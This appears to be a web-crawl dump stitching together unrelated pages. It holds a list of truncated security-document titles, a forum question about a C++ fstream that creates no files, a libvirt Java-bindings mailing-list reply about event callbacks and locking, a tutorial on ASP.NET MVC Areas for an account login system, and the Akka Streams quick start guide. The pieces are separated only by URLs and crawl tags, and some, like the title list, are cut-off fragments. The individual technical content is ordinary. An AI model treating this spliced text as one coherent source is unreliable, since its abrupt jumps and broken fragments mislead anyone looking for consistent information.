Operating Systems Autumn 2013 Outline 1 2 Types of 2.4, SGG The OS Kernel The kernel is the central component of an OS It has complete control over everything that occurs in the system Kernel overview
Virtual Machine Security
Virtual Machine Security CSE497b - Spring 2007 Introduction Computer and Network Security Professor Jaeger 1 Operating System Quandary Q: What is the primary goal
CheckPoint FireWall-1 Version 3.0 Highlights Contents
CheckPoint FireWall-1 Version 3.0 Highlights Contents Abstract...2 Active Network Management...3 Accounting... 3 Live Connections Report... 3 Load balancing... 3 Exporting log records to Informix database...
An Implementation Of Multiprocessor Linux
An Implementation Of Multiprocessor Linux This document describes the implementation of a simple SMP Linux kernel extension and how to use this to develop SMP Linux kernels for architectures other than
RE-TRUST Design Alternatives on JVM
RE-TRUST Design Alternatives on JVM ( - Italy) [email protected] Trento, December, 19 th 2006 Tamper-Detection Tamper-detection goals Detect malicious modifications
Java and Java Virtual Machine Security
Java and Java Virtual Machine Security Vulnerabilities and their Exploitation Techniques by Last Stage of Delirium Research Group Version: 1.0.0 Updated: October 2nd, 2002 Copyright c
CSC 551: Web Programming. Spring 2004
CSC 551: Web Programming Spring 2004 Java Overview Design goals & features platform independence, portable, secure, simple, object-oriented, Programming models applications vs. applets vs. servlets intro
About Network Data Collector
CHAPTER 2 About Network Data Collector The Network Data Collector is a telnet and SNMP-based data collector for Cisco devices which is used by customers to collect data for Net Audits. It provides a
CatDV Pro Workgroup Serve r
Architectural Overview CatDV Pro Workgroup Server Square Box Systems Ltd May 2003 The CatDV Pro client application is a standalone desktop application, providing video logging and media cataloging capability.
Last Class: OS and Computer Architecture. Last Class: OS and Computer Architecture
Last Class: OS and Computer Architecture System bus Network card CPU, memory, I/O devices, network card, system bus Lecture 3, page 1 Last Class: OS and Computer Architecture OS Service Protection Interrupts
CS 4803 Computer and Network Security
Access to general objects CS 4803 Computer and Network Security Memory protection is only one example Need a way to protect more general objects Before we begin, some design principles Alexandra (Sasha)
Effective Java Programming. efficient software development
Effective Java Programming efficient software development Structure efficient software development what is efficiency? development process profiling during development what determines the performance
Operating Systems and Networks
recap Operating Systems and Networks How OS manages multiple tasks Virtual memory Brief Linux demo Lecture 04: Introduction to OS-part 3 Behzad Bordbar 47 48 Contents Dual mode API to wrap system calls
UserLock vs Microsoft CConnect
UserLock vs Microsoft White paper This document reviews how Microsoft and ISDecisions UserLock achieve logon management, and focuses on the concurrent connections restriction features provided by these
Network and Host-based Vulnerability Assessment
Network and Host-based Vulnerability Assessment A guide for information systems and network security professionals 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free:
Auditing a Web Application. Brad Ruppert. SANS Technology Institute GWAS Presentation 1
Auditing a Web Application Brad Ruppert SANS Technology Institute GWAS Presentation 1 Objectives Define why application vulnerabilities exist Address Auditing Approach Discuss Information Interfaces Walk
Background. How much does EMET cost? What is the license fee? EMET is freely available from Microsoft without material cost.
Microsoft s Enhanced Mitigation Experience Toolkit (EMET) is an enhancement to the Windows operating system that stops broad classes of malware from executing. EMET implements a set of anti-exploitation
Digital signature in insecure environments
Digital signature in insecure environments Janne Varjus Helsinki University of Technology [email protected] Abstract Due to current legislation the digital signatures can be as valid as the hand written
Performance Monitoring API for Java Enterprise Applications
Performance Monitoring API for Java Enterprise Applications Purpose Perfmon4j has been successfully deployed in hundreds of production java systems over the last 5 years. It has proven to be a highly successful
CIS433/533 - Computer and Network Security Operating System Security
CIS433/533 - Computer and Network Security Operating System Security Professor Kevin Butler Winter 2010 Computer and Information Science OS Security An secure OS should provide (at least) the following
ActiveX vs. Java By: Blake Stockslager
ActiveX vs. Java By: Blake Stockslager Anyone that uses a computer today mainly uses it for access to the internet. While what that person is actually doing on the internet might seem perfectly harmless,
Database Security Guide
Institutional and Sector Modernisation Facility ICT Standards Database Security Guide Document number: ISMF-ICT/3.03 - ICT Security/MISP/SD/DBSec Version: 1.10 Project Funded by the European Union 1 Document | http://docplayer.net/1454577-Extensible-security-architectures-for-java.html | CC-MAIN-2017-13 | en | refinedweb |
I've been testing out some code I wrote on a test program. Although GDB doesn't catch anything and it runs fine, it's supposed to generate output files. It did that at first, but after debugging various other aspects of the test program, it doesn't generate any files at all. Extensive debugging of that yielded nothing.
The strange part is I started another test -- copy/pasted/compiled the fstream example from cplusplus.com and even *that* didn't generate files. I added a simple "cout << filestr.fail() << endl;" statement and the compiled example always outputs a 1.
I'm running these tests with root privileges, plenty of memory, and 92 GB of free disk space. The fact that not even a simple C++ code snippet from a reference site generates files is eerie. This is the said snippet, with the failbit check I added and a test I/O operation:
Code:#include <iostream> #include <fstream> using namespace std; int main () { fstream filestr ("test.txt", fstream::in | fstream::out); cout << filestr.fail() << endl; filestr << " dsgesvsvds"; filestr.close(); return 0; } | https://cboard.cprogramming.com/cplusplus-programming/131706-std-fstream-fail-anomaly.html | CC-MAIN-2017-13 | en | refinedweb |
On Wed, 2008-11-12 at 10:22 +0100, Daniel Veillard wrote: > On Fri, Nov 07, 2008 at 03:46:37PM -0500, David Lively wrote: > > It shouldn't be hard to make this thread-safe using Java synchronized > > methods and statements, but I haven't done that yet. Should I?? > > Well if we can, we probably should, yes. I found a bit of explanations > at > Right. Mostly it consists of declaring certain methods as "synchronized", and wrapping other code in "synchronized" blocks. The more I think about it, the more I'm convinced this should be done. > if we can do that entierely in the java part of the bindings, then yes > that looks a really good idea. We just need to make sure locking is at > the connection granularity, not at the library level to not force > applications monitoring a bunch of nodes to serialize all their access > on a single lock. I'll go ahead and do this with per-connection locks. I suppose this means I need to make the various Domain/Network/StoragePool/StorageVol methods synchronize on the connection as well .... so this will involve a fair amount of churn in the Java code. I'll try to implement it over the weekend and submit something by Monday. > > +++ b/EventTest.java > > @@ -0,0 +1,35 @@ > > +import org.libvirt.*; > > + > > +class TestDomainEventListener implements DomainEventListener { > Can we move this under src/ ... along test.java ? Sure. > > > +++ b/src/jni/org_libvirt_Connect.c > > @@ -1,3 +1,4 @@ > > +#include <jni.h> > [...] > > +static JavaVM *jvm; > > + > > +jint JNICALL JNI_OnLoad(JavaVM *vm, void *reserved) { > > + jvm = vm; > > + return JNI_VERSION_1_4; > > +} > > Hum, what is this ? This is a little hook that gets called when the libvirt JNI bindings are loaded. I use it to grab the JavaVM pointer, which we'll need later in domainEventCallback. domainEventCallback is called asynchronously from the libvirt eventImpl. It's not a JNI call that gets a JNIEnv passed to it, but it needs the JNIEnv in order to make the Java callbacks. We need the JavaVM pointer so that we can get the JNIEnv via (*jvm)->GetEnv() (see below). > > +static int domainEventCallback(virConnectPtr conn, virDomainPtr dom, > > + int event, void *opaque) > > +{ > > + jobject conn_obj = (jobject)opaque; > > + JNIEnv * env; > > + jobject dom_obj; > > + jclass dom_cls, conn_cls; > > + jmethodID ctorId, methId; > > + > > + // Invoke conn.fireDomainEventCallbacks(dom, event) > > + > > + if ((*jvm)->GetEnv(jvm, (void **)&env, JNI_VERSION_1_4) != JNI_OK || env == NULL) { > > + printf("error getting JNIEnv\n"); > > + return -1; > > + } > > + > > + dom_cls = (*env)->FindClass(env, "org/libvirt/Domain"); > > + if (dom_cls == NULL) { > > + printf("error finding class Domain\n"); > > + return -1; > > + } > > + > > + ctorId = (*env)->GetMethodID(env, dom_cls, "<init>", "(Lorg/libvirt/Connect;J)V"); > > + if (ctorId == NULL) { > > + printf("error finding Domain constructor\n"); > > + return -1; > > + } > > + > > + dom_obj = (*env)->NewObject(env, dom_cls, ctorId, conn_obj, dom); > > + if (dom_obj == NULL) { > > + printf("error constructing Domain\n"); > > + return -1; > > + } > > + > > + conn_cls = (*env)->FindClass(env, "org/libvirt/Connect"); > > + if (conn_cls == NULL) { > > + printf("error finding class Connect\n"); > > + return -1; > > + } > > + > > + methId = (*env)->GetMethodID(env, conn_cls, "fireDomainEventCallbacks", "(Lorg/libvirt/Domain;I)V"); > > + if (methId == NULL) { > > + printf("error finding Connect.fireDomainEventCallbacks\n"); > > + return -1; > > + } > > + > > + (*env)->CallVoidMethod(env, conn_obj, methId, dom_obj, event); > > + > > + return 0; > > +} > > ... > > diff --git a/src/org/libvirt/Connect.java b/src/org/libvirt/Connect.java > > index 4271937..7ccaecd 100644 > > --- a/src/org/libvirt/Connect.java > > +++ b/src/org/libvirt/Connect.java > [...] > > public class Connect { > > > > + static public EventImpl eventImpl; > > + > > // Load the native part > > static { > > System.loadLibrary("virt_jni"); > > _virInitialize(); > > + eventImpl = new EventImpl(); > > } > > > > okay, that's the hook. > Another possibility might be to use a new creation method for > Connect.new() taking an extra EventImpl class implementation. But remember EventImpl is global, not per-Connect. > > diff --git a/src/org/libvirt/EventImpl.java b/src/org/libvirt/EventImpl.java > > new file mode 100644 > > index 0000000..1868fe3 > > --- /dev/null > > +++ b/src/org/libvirt/EventImpl.java > > @@ -0,0 +1,31 @@ > > +package org.libvirt; > > + > > +import java.util.HashMap; > > + > > +// While EventImpl does implement Runnable, don't declare that until > > +// the we add concurrency control for the libvirt Java bindings and > > +// the EventImpl callbacks. > > + > > +final public class EventImpl { > > Hum, why final ? Oops. No reason -- left over from some other experiment. | https://www.redhat.com/archives/libvir-list/2008-November/msg00195.html | CC-MAIN-2017-13 | en | refinedweb |
There are companies that provide discount dodge parts
they offer high quality and only from the most trusted and
recognized auto body parts manufacturers & also featuring wholesale
auto body parts, aftermarket auto parts, replacement OEM car parts
and new truck parts
They provide Car parts of Acura Parts, Alfa Romeo
Parts, Amc Parts, Amg Parts, Audi Parts, Bmw Parts, Buick Parts,
Cadillac Parts, Chevrolet Parts, Chevy Parts, Chrysler Parts, Daewoo
Parts, Daihatsu Parts, Delorean Parts, Dodge Parts, Eagle Parts,
Ford Parts, Geo Parts, Gmc Parts, Honda Parts, Hummer Parts, Hyundai
Parts, Infiniti Parts, Isuzu Parts, Iveco Parts, Jaguar Parts, Jeep
Parts and many more...You can get Catalog of auto part which includes BMW
parts, Ford parts, GM Chevy parts, Dodge parts, Honda parts, Jeep
parts, Nissan parts, Toyota parts, VW parts, Volvo parts and other
import parts and replacement used auto parts. They maintain a large
inventory of auto & truck bumpers, head lights, tail lights,
Fenders, Grilles, radiators and other crash auto parts. Do not buy
used auto parts before checking the replacement auto parts catalog.
Content Courtesy by : autobodypartsonline.com | http://habibintl.com/auto_body_parts.htm | CC-MAIN-2017-13 | en | refinedweb |
Over the past 5 days I’ve implemented a fairly reasonable account login system that allows for logging in and out, handling registrations and handling forgotten passwords. I do have a major problem architecturally with this codebase though. My views, view models and controller for this logic is intermingled with my main application code. It’s not really a problem within this application since the actual application isn’t doing anything, but it can be a major pain in bigger applications. A similar case could be made for management and configuration code vs. the main application. I’d rather have the views, controller and view models all in their own separate area.
ASP.NET MVC has had a concept called Areas for this in the past. It’s configured a little bit differently than in the old ASP.NET but is the same concept. I get to put the pieces that make up the view and controller system in its own separate area.
This article is about doing this for the account login system I’ve been working on for the last five days. Explicitly, I want:
- A login and logout controller that just do that
- A registration controller that just does that
- A forgotten password controller that just does that
This way each of my workflows are separated from the other workflows with their own views and controllers. Let’s get started.
Configuring Areas
To configure the application to handle areas, I need to change the route mapping in Startup.cs. This is the new code:
// Configure ASP.NET MVC6 app.UseMvc(routes => { routes.MapRoute( name: "areaDefault", template: "{area:exists}/{controller}/{action=Index}/{id?}"); routes.MapRoute( name: "default", template: "{controller=Home}/{action=Index}/{id?}" ); });
The default route was already there from my prior work. The areaDefault is new. You can see that it isn’t much different. It just has that {area:exists} in the front. If I create an area called Account, then a controller called Login and an action method called Index, it can be accessed via /Account/Login/Index or /Account/Login since Index is the default action. Note that the ASP.NET Identity Framework re-directs to /Account/Login when authentication is needed, so this seems like a perfect solution.
Creating an Area
All my areas live in a new folder called Areas. My new area is called Account. Within the Account area are folders for Controllers, ViewModels and Views. Once I’ve done this, my folder layout looks like the below:
Creating the Login Controller and Views
Since I am splitting my AccountController into three pieces, I will want three controllers. I am only showing you one of the three controllers in this article. You can refactor the AccountController to do the other two yourself or look at the resulting code at the end on my GitHub Repository.
The LoginController.cs file lives in Areas\Account\Controllers and looks like this:
using System.Threading.Tasks; using AspNetIdentity.Areas.Account.ViewModels; using AspNetIdentity.Models; using Microsoft.AspNet.Identity; using Microsoft.AspNet.Mvc; namespace AspNetIdentity.Areas.Account.Controllers { [Area("Account")] public class LoginController : Controller { public LoginController(; } // GET: /Account/Login/Index [HttpGet] [AllowAnonymous] public IActionResult Index() { return View(); } // POST: /Account/Login/Index [HttpPost] [AllowAnonymous] [ValidateAntiForgeryToken] public async Task<IActionResult> Index(LoginViewModel model, string returnUrl = null) { ViewBag.ReturnUrl = returnUrl; if (ModelState.IsValid) { var result = await SignInManager.PasswordSignInAsync(model.UserName, model.Password, model.RememberMe, shouldLockout: false); if (result.Succeeded) { if (Url.IsLocalUrl(returnUrl)) { return Redirect(returnUrl); } else { return RedirectToAction("Index", "Home"); } } if (result.IsLockedOut) { ModelState.AddModelError("", "Locked Out"); } else if (result.IsNotAllowed) { ModelState.AddModelError("", "Not Allowed"); } else if (result.RequiresTwoFactor) { ModelState.AddModelError("", "Requires Two-Factor Authentication"); } else { ModelState.AddModelError("", "Invalid username or password."); } return View(model); } // If we got this far, something failed - redisplay the form return View(model); } // (GET|POST): /Account/Login/Logout public IActionResult Logout() { SignInManager.SignOut(); return RedirectToAction("Index", "Home"); } } }
You might be saying “Wait a minute – that’s all the same code as before!” You would be right. There are a couple of differences. Firstly, I’ve added an [Area("Account")] decorator to the class. This indicates to the MVC framework that this is an area and needs to go through the routing that we’ve just established. I’ve also renamed the methods to Index so this can be accessed through /Account/Login. This does have a ViewModel called LoginViewModel that is needed. This is placed in the Areas/Account/ViewModels directory and looks exactly the same:
using System.ComponentModel.DataAnnotations; namespace AspNetIdentity.Areas.Account.ViewModels { public class LoginViewModel { [Required] [Display(Name = "User name")] public string UserName { get; set; } [Required] [DataType(DataType.Password)] [Display(Name = "Password")] public string Password { get; set; } [Display(Name = "Remember me?")] public bool RememberMe { get; set; } } }
The only thing that has changed here is the namespace – it’s now in the Areas namespace rather than the top level namespace.
As I move along this process I am removing the code from the AccountController and the classes I no longer need from their locations. This prevents confusion as to where I am in the refactoring process.
For the view, I’ve created a Login folder underneath Areas\Account\Views since I’m working with the LoginController. I’ve copied over the Views\Layouts\LoginPage.cshtml and placed it in Areas\Account\Views\Layout.cshtml I’ve also created a ViewStart.cshtml file. I did some cosmetic moving around and updating of the paths. Here is the _ViewStart.cshtml file:
@{ Layout = "~/Areas/Account/Views/Layout.cshtml"; }
Note that each area can have it’s own _ViewStart.cshtml file, so it can have its own dedicated layout. In the prior 5 articles, I had to specify the “login code layout” everywhere. Now I don’t have to do that – I can specify it centrally.
And here is the Layout.cshtml file:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="~/lib/font-awesome/css/font-awesome.min.css" rel="stylesheet"> <link rel="stylesheet" href="~/Style/Login.css"> <title>@ViewBag.Title</title> </head> <body> <div class="flex-container"> <div class="login-outer-form"> @RenderBody() </div> </div> <section id="scripts" style="visibility:hidden;"> @RenderSection("scripts", required: false) </section> </body> </html>
The only real difference here is cosmetic. Every single one of my views was wrapped inside of the flex-container and login-outer-form. Rather than put them inside of each view, I’ve promoted that to the layout. The Index.cshtml file looks almost like a copy of the old Login.cshtml; like this:
@model AspNetIdentity.Areas.Account.ViewModels.LoginViewModel @{ ViewBag. <h4 id="localLoginSelector" class="active">Local</h4> <h4 id="socialLoginSelector">Social</h4> </div> <div class="login-form-area"> <div id="localLogin"> @using (Html.BeginForm("Index", "Login", new { ReturnUrl = ViewBag.ReturnUrl }, FormMethod.Post, new { <div class="control-label"><span class="fa fa-envelope"></span></div> <div class="form-control"> @Html.TextBoxFor(m => m.UserName) @Html.ValidationMessageFor(m => m.UserName) </div> </div> <div class="form-group"> <div class="control-label"><span class="fa fa-key"></span></div> <div class="form-control"> @Html.PasswordFor(m => m.Password) @Html.ValidationMessageFor(m => m.Password) </div> </div> <div class="form-group"> <div class="checkbox"> @Html.CheckBoxFor(m => m.RememberMe) @Html.LabelFor(m => m.RememberMe) </div> </div> <div class="submit-btn" id="login-btn">Login</div> } <div class="login-form-options"> <div class="register-link"> <a href="/Account/Register">Register<br>Account</a> </div> <div class="forgot-link"> <a href="/Account/Forgot">Forgot<br>Password</a> </div> </div> </div> <div id="socialLogin"> <h4>COMING SOON!</h4> </div> </div> @section scripts { <script src="~/lib/jquery/dist/jquery.min.js"></script> <script> $(document).ready(function () { function activate(on) { var off = (on === "local") ? "social" : "local", onSelector = $("#" + on + "LoginSelector"), offSelector = $("#" + off + "LoginSelector"), onBlock = $("#" + on + "Login"), offBlock = $("#" + off + "Login"); offSelector.removeClass("active"); onSelector.addClass("active"); offBlock.hide(); onBlock.show(); } activate("local"); $("#socialLoginSelector").click(function () { activate("social"); }); $("#localLoginSelector").click(function () { activate("local"); }); $("#login-btn").click(function () { $("#login-form").submit(); }); }); </script> }
The changes here are minor. I’ve removed the flex-container and login-form-outer wrapping. I’ve changed the namespace of the ViewModel at the top so that it points to the new location. I’ve removed the Layout as it is now handled for me. The important change is in the Html.BeginForm I’ve isolated that change below:
@using (Html.BeginForm("Index", "Login", new { ReturnUrl = ViewBag.ReturnUrl }, FormMethod.Post, new { id = "login-form", area = "Account" }))
Firstly, the first two parameters have been reflected to the new controller and action names. Secondly, the area has been specified in the options area.
I also had to do a small change as a result of the HTML movement between view and layout. Specifically, there are two rules wrapped in a #login – I removed the #login wrapper.
Change your other (dependent) views
In the Views\Layout\MainSite.cshtml, there is a link to log out. I’ve changed that link to /Account/Login/Logout since it’s in an area now. I need to make a similar change to the Home view for it to work. In my case, I converted the form to an ActionLink – it’s in the middle of the new MainSite.cshtml file:
< navbar-right"> <li>@Html.ActionLink("Log Out", "Logout", "Login", new { @RenderBody() </section> <section id="scripts"> <script src="~/lib/requirejs/require.js" data-</script> </section> </body> </html>
Wrapping Up
I love Areas. They assist in code organization and keep the views, view models and controllers for associated content together, rather than spread across the project. I highly recommend their use.
Check out the code after I’ve done all the re-factoring at my GitHub Repository. | https://shellmonger.com/2015/04/08/configuring-areas-in-asp-net-vnext/ | CC-MAIN-2017-13 | en | refinedweb |
On Tue, May 10, 2011 at 6:23 PM, <[email protected]> wrote:
>
>
> Danielle,
>
>
>
> We had similar issues with spring xml files, and you're correct, you cannot
> access spring.xml files between bundles. To be clear though, are you
> referring to the xml files in META-INF/spring or are you referring to the
> .xsd files spring uses in its namespaces?
>
to the xml files in META-INF/spring
also, the xml I'd like to load, i'd rather not put them in that folder cause
xml in that folder is automatically loaded by spring-dm.
What I'm thinking about are some xml used as resources, not started by
spring-dm in any way, that can be included in the spring context of another
bundle just as like I can instantiate a class from an imported bundle.
Included not with some custom code (not only at least) but with some
mechanism like import classpath*: that loads from dependent jars. | http://mail-archives.apache.org/mod_mbox/felix-users/201105.mbox/%[email protected]%3E | CC-MAIN-2017-13 | en | refinedweb |
Quick Start Guide
A stream usually begins at a source, so this is also how we start an Akka Stream. Before we create one, we import the full complement of streaming tools:
import akka.stream._ import akka.stream.scaladsl._
If you want to execute the code samples while you read through the quick start guide, you will also need the following imports:
import akka.{ NotUsed, Done } import akka.actor.ActorSystem import akka.util.ByteString import scala.concurrent._ import scala.concurrent.duration._ import java.nio.file.Paths
Now we will start with a rather simple source, emitting the integers 1 to 100:
val source: Source[Int, NotUsed] = Source(1:
source.runForeach(i =>.
You may wonder where the Actor gets created that runs the stream, and you are probably also asking yourself what this materializer means. In order to get this value we first need to create an Actor system:
implicit val system = ActorSystem("QuickStart") implicit val materializer = ActorMaterializer():
val factorials = source.scan(BigInt(1))((acc, next) => acc * next) val result: Future[IOResult] = factorials .map(num => ByteString(s"$num\n")) .runWith(FileIO.toPath(Paths.get("factorials.txt")))
First we use the scan combinator to run a computation over the whole stream: starting with the number 1 (BigInt(1)):
def lineSink(filename: String): Sink[String, Future[IOResult]] = Flow[String] .map(s => ByteString(s + "\n")) .toMat(FileIO.toPath(Paths.get(filename)))(Keep.right)
Starting from a flow of strings we convert each to ByteString and then feed to the already known file-writing Sink. The resulting blueprint is a Sink[String, Future[IOResult]], which means that it accepts strings as its input and when materialized it will create auxiliary information of type Future).
We can use the new and shiny Sink we just created by attaching it to our factorials source—after a small adaptation to turn the numbers into strings:
factorials.map(_.toString).runWith(lineSink("factorial2.txt"))".
val done: Future[Done] = factorials .zipWith(Source(0 to 100))((num, idx) => s"$idx! = $num") .throttle(1, 1.second, 1, ThrottleMode.shaping) .runForeach(println) Overview of built-in stages and their semantics.:
final case class Author(handle: String) final case class Hashtag(name: String) final case class Tweet(author: Author, timestamp: Long, body: String) { def hashtags: Set[Hashtag] = body.split(" ").collect { case t if t.startsWith("#") => Hashtag(t) }.toSet } val akkaTag = Hashtag("#akka")
Note:
implicit val system = ActorSystem("reactive-tweets") implicit val materializer = ActorMaterializer()]:
val tweets: Source[Tweet, NotUsed] – they are "materialized types", which we'll talk about below).
The operations should look familiar to anyone who has used the Scala Collections library, however they operate on streams and not collections of data (which is a very important distinction, as some operations only make sense in streaming and vice versa):
val authors: Source[Author, NotUsed] = tweets .filter(_.hashtags.contains(akkaTag)) Sink companion object. For now let's simply print each author:
authors.runWith(Sink.foreach(println))
or by using the shorthand version (which are defined only for the most popular Sinks such as Sink.fold and Sink.foreach):
authors.runForeach(println)
Materializing and running a stream always requires a Materializer to be in implicit scope (or passed in explicitly, like this: .run(materializer)).
The complete snippet looks like this:
implicit val system = ActorSystem("reactive-tweets") implicit val materializer = ActorMaterializer() val authors: Source[Author, NotUsed] = tweets .filter(_.hashtags.contains(akkaTag)) .map(_.author) authors.runWith(Sink.foreach(println)):
val hashtags: Source[Hashtag, NotUsed] =, the monad laws would not hold for our implementation of flatMap (due to the liveness issues).
Please note that the mapConcat requires the supplied function to return a strict collection (f:Out=>immutable.Seq:
val writeAuthors: Sink[Author, Unit] = ??? val writeHashtags: Sink[Hashtag, Unit] = ???()
As you can see, inside the GraphDSL we use an implicit graph builder b to mutably construct the graph using the ~> "edge operator" (also read as "connect" or "via" or "to"). The operator is provided implicitly by importing GraphDSL.Implicits._.
GraphDSL.create returns a Graph, in this example a:
tweets .buffer(10, OverflowStrategy.dropHead) .map(slowComputation) .runWith(Sink.ignore)
The buffer element takes an explicit and required OverflowStrategy, which defines how the buffer should react when it receives another element while it is full. Strategies provided include dropping the oldest element (dropHead), dropping the entire buffer, signalling errors see how the types look like:")).
Remember those mysterious Mat type parameters on Source[+Out, +Mat], Flow[-In, +Out, +Mat] and Sink[-In, +Mat]?. The materialized type of sumSink is Future[Int] and because of using Keep.right, the resulting RunnableGraph has also a type parameter of Future[Int].
This step does not yet materialize the processing pipeline, it merely prepares the description of the Flow, which is now connected to a Sink, and therefore can be run(), as indicated by its type: RunnableGraph[Future[Int]]. Next we call run() which uses the implicit ActorMaterializer to materialize and run the Flow. The value returned by calling run() on a RunnableGraph[T] is of type T. In our case this type is Future[Int]:
val sumSink = Sink.fold[Int, Int](0)(_ + _) val counterRunnableGraph: RunnableGraph[Future[Int]] = tweetsInMinuteFromNow .filter(_.hashtags contains akkaTag) .map(t =>:
val sum: Future[Int] = tweets.map(t => 1).runWith(sumSink)
Note
runWith() is a convenience method that automatically ignores the materialized value of any other stages except those appended by the runWith() itself. In the above example it translates to using Keep.right as the combiner for materialized values.
Contents | http://doc.akka.io/docs/akka/2.4/scala/stream/stream-quickstart.html | CC-MAIN-2017-13 | en | refinedweb |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.